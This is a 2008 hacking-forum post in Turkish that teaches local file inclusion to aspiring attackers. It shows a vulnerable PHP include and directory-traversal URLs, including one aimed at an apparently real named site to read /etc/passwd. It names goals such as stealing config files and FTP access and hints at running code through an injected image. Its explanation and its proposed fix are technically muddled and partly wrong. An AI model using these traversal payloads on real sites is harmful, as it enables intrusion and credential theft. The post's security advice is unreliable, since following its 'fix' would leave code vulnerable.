[ Новые сообщения · Участники · Правила форума · Поиск · RSS ]
Страница 1 из 11
Forum » Web Hack » Web HACK » Sırf RFI Öğrenmeyin! Okuyun! (Sırf RFI Öğrenmeyin! Okuyun!)
Sırf RFI Öğrenmeyin! Okuyun!
ZeynalcikДата: Вторник, 15.07.2008, 09:40 | Сообщение # 1
Генералиссимус
Qurp: Bas_Admin
Сообщений: 69
Репутация: 0
Статус: Burda yoxdur
Rfi kadar işlevselliği olmayan ama her Hacker adayı için bilmesi gereken bir açık türü olan LFI yi anlatacağım.
THE_MILLER

1 ) LFI nedir ?
THE_MILLER

Lfı uzaktan servera dosya ekleme dahil etme anlamına gelir.

2 ) Rfi Kadar etkilimidir ?
THE_MILLER

Rfi kadar etkili olamasada yeterlidir.

Kullanımını Anlatayım

THE_MILLER
<?php
include ('data/$miller/function.php');
?>

burda gördünüz gibi rfi olarak düşünürsen miller
tanımlanmamış .

fakat bu lfi de shell olarak kullanılamaz tanımlanmayan degişken (miller)kullanılarak dosya okunabilir yukarıdaki kodu robot.php olarak kaydedin

Daha sonra

http://www.herhangisite.com/robot.php?miller=../../../TurkHackTeam

dosyası okunabilir izin varsa okunur bu
açıkla neler yapılır ?

etc/passwd , config okuruz ya da ftp alırız ...

LFI açığını Nasıl Kapatırız ?
THE_MILLER

<?php
$miller='sdwd'
include ('data/$miller/function.php');
?>
THE_MILLER

bu kod sayesinde açık kapaır çünkü miller 'i burda tanımladık

http://www.herhangisite.com/robot.php?miller=../../../TurkHackTEam

yaptığınız an LFI çalışmaz

Örnek LFI :

THE_MILLER

http://charlotte-wilson.net/view.ph.....%2F..% 2F..%2F..%2F..%2Fetc%2Fpasswd

Not: Lfi açığı olan sisteme kod enjekte edilmiş bir jpg dosya atılarak server üzerinde işlem yapılabilir. wink

 
Forum » Web Hack » Web HACK » Sırf RFI Öğrenmeyin! Okuyun! (Sırf RFI Öğrenmeyin! Okuyun!)
Страница 1 из 11
Поиск: